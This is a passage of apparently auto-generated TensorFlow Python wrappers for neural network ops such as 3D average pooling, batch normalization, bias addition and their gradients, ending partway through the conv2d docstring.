strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [value]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def avg_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Performs 3D average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize` window in
`value`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, channels]` tensor to pool over.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool3D", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool3d_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool3D", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool3D = tf_export("raw_ops.AvgPool3D")(_ops.to_raw_op(avg_pool3d))
def avg_pool3d_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def avg_pool3d_grad(orig_input_shape, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes gradients of average pooling function.
Args:
orig_input_shape: A `Tensor` of type `int32`.
The original input dimensions.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool3DGrad", name, orig_input_shape, grad, "ksize", ksize,
"strides", strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool3d_grad_eager_fallback(
orig_input_shape, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool3DGrad", orig_input_shape=orig_input_shape, grad=grad,
ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool3DGrad = tf_export("raw_ops.AvgPool3DGrad")(_ops.to_raw_op(avg_pool3d_grad))
def avg_pool3d_grad_eager_fallback(orig_input_shape, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
orig_input_shape = _ops.convert_to_tensor(orig_input_shape, _dtypes.int32)
_inputs_flat = [orig_input_shape, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool3DGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def avg_pool_grad(orig_input_shape, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes gradients of the average pooling function.
Args:
orig_input_shape: A `Tensor` of type `int32`.
1-D. Shape of the original input to `avg_pool`.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, height, width, channels]`. Gradients w.r.t.
the output of `avg_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the sliding window for each dimension of the input.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPoolGrad", name, orig_input_shape, grad, "ksize", ksize,
"strides", strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool_grad_eager_fallback(
orig_input_shape, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPoolGrad", orig_input_shape=orig_input_shape, grad=grad,
ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPoolGrad = tf_export("raw_ops.AvgPoolGrad")(_ops.to_raw_op(avg_pool_grad))
def avg_pool_grad_eager_fallback(orig_input_shape, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
orig_input_shape = _ops.convert_to_tensor(orig_input_shape, _dtypes.int32)
_inputs_flat = [orig_input_shape, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def _batch_norm_with_global_normalization(t, m, v, beta, gamma, variance_epsilon, scale_after_normalization, name=None):
r"""Batch normalization.
This op is deprecated. Prefer `tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
A 4D input Tensor.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
beta: A `Tensor`. Must have the same type as `t`.
A 1D beta Tensor with size matching the last dimension of t.
An offset to be added to the normalized tensor.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this tensor will be multiplied
with the normalized tensor.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulted tensor
needs to be multiplied with gamma.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BatchNormWithGlobalNormalization", name, t, m, v, beta, gamma,
"variance_epsilon", variance_epsilon, "scale_after_normalization",
scale_after_normalization)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return _batch_norm_with_global_normalization_eager_fallback(
t, m, v, beta, gamma, variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BatchNormWithGlobalNormalization", t=t, m=m, v=v, beta=beta,
gamma=gamma,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BatchNormWithGlobalNormalization = tf_export("raw_ops.BatchNormWithGlobalNormalization")(_ops.to_raw_op(_batch_norm_with_global_normalization))
def _batch_norm_with_global_normalization_eager_fallback(t, m, v, beta, gamma, variance_epsilon, scale_after_normalization, name, ctx):
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_T, _inputs_T = _execute.args_to_matching_eager([t, m, v, beta, gamma], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(t, m, v, beta, gamma) = _inputs_T
_inputs_flat = [t, m, v, beta, gamma]
_attrs = ("T", _attr_T, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"BatchNormWithGlobalNormalization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_BatchNormWithGlobalNormalizationGradOutput = collections.namedtuple(
"BatchNormWithGlobalNormalizationGrad",
["dx", "dm", "dv", "db", "dg"])
def batch_norm_with_global_normalization_grad(t, m, v, gamma, backprop, variance_epsilon, scale_after_normalization, name=None):
r"""Gradients for batch normalization.
This op is deprecated. See `tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
A 4D input Tensor.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this Tensor will be multiplied
with the normalized Tensor.
backprop: A `Tensor`. Must have the same type as `t`. 4D backprop Tensor.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulted tensor
needs to be multiplied with gamma.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (dx, dm, dv, db, dg).
dx: A `Tensor`. Has the same type as `t`.
dm: A `Tensor`. Has the same type as `t`.
dv: A `Tensor`. Has the same type as `t`.
db: A `Tensor`. Has the same type as `t`.
dg: A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BatchNormWithGlobalNormalizationGrad", name, t, m, v, gamma,
backprop, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return batch_norm_with_global_normalization_grad_eager_fallback(
t, m, v, gamma, backprop, variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BatchNormWithGlobalNormalizationGrad", t=t, m=m, v=v, gamma=gamma,
backprop=backprop,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BatchNormWithGlobalNormalizationGrad", _inputs_flat, _attrs, _result)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
BatchNormWithGlobalNormalizationGrad = tf_export("raw_ops.BatchNormWithGlobalNormalizationGrad")(_ops.to_raw_op(batch_norm_with_global_normalization_grad))
def batch_norm_with_global_normalization_grad_eager_fallback(t, m, v, gamma, backprop, variance_epsilon, scale_after_normalization, name, ctx):
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_T, _inputs_T = _execute.args_to_matching_eager([t, m, v, gamma, backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(t, m, v, gamma, backprop) = _inputs_T
_inputs_flat = [t, m, v, gamma, backprop]
_attrs = ("T", _attr_T, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"BatchNormWithGlobalNormalizationGrad", 5,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BatchNormWithGlobalNormalizationGrad", _inputs_flat, _attrs, _result)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
def bias_add(value, bias, data_format="NHWC", name=None):
r"""Adds `bias` to `value`.
This is a special case of `tf.add` where `bias` is restricted to be 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
bias: A `Tensor`. Must have the same type as `value`.
1-D with size the last dimension of `value`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the bias tensor will be added to the last dimension
of the value tensor.
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
The tensor will be added to "in_channels", the third-to-the-last
dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAdd", name, value, bias, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_eager_fallback(
value, bias, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAdd", value=value, bias=bias, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAdd", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAdd = tf_export("raw_ops.BiasAdd")(_ops.to_raw_op(bias_add))
def bias_add_eager_fallback(value, bias, data_format, name, ctx):
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([value, bias], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(value, bias) = _inputs_T
_inputs_flat = [value, bias]
_attrs = ("T", _attr_T, "data_format", data_format)
_result = _execute.execute(b"BiasAdd", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAdd", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def bias_add_grad(out_backprop, data_format="NHWC", name=None):
r"""The backward operation for "BiasAdd" on the "bias" tensor.
It accumulates all the values from out_backprop into the feature dimension.
For NHWC data format, the feature dimension is the last. For NCHW data format,
the feature dimension is the third-to-last.
Args:
out_backprop: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the bias tensor will be added to the last dimension
of the value tensor.
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
The tensor will be added to "in_channels", the third-to-the-last
dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `out_backprop`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAddGrad", name, out_backprop, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_grad_eager_fallback(
out_backprop, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAddGrad", out_backprop=out_backprop, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAddGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAddGrad = tf_export("raw_ops.BiasAddGrad")(_ops.to_raw_op(bias_add_grad))
def bias_add_grad_eager_fallback(out_backprop, data_format, name, ctx):
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (out_backprop,) = _execute.args_to_matching_eager([out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [out_backprop]
_attrs = ("T", _attr_T, "data_format", data_format)
_result = _execute.execute(b"BiasAddGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAddGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def bias_add_v1(value, bias, name=None):
r"""Adds `bias` to `value`.
This is a deprecated version of BiasAdd and will be soon removed.
This is a special case of `tf.add` where `bias` is restricted to be 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
bias: A `Tensor`. Must have the same type as `value`.
1-D with size the last dimension of `value`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAddV1", name, value, bias)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_v1_eager_fallback(
value, bias, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAddV1", value=value, bias=bias, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAddV1", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAddV1 = tf_export("raw_ops.BiasAddV1")(_ops.to_raw_op(bias_add_v1))
def bias_add_v1_eager_fallback(value, bias, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([value, bias], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(value, bias) = _inputs_T
_inputs_flat = [value, bias]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BiasAddV1", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAddV1", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv2d(input, filter, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2-D convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`, this op
performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
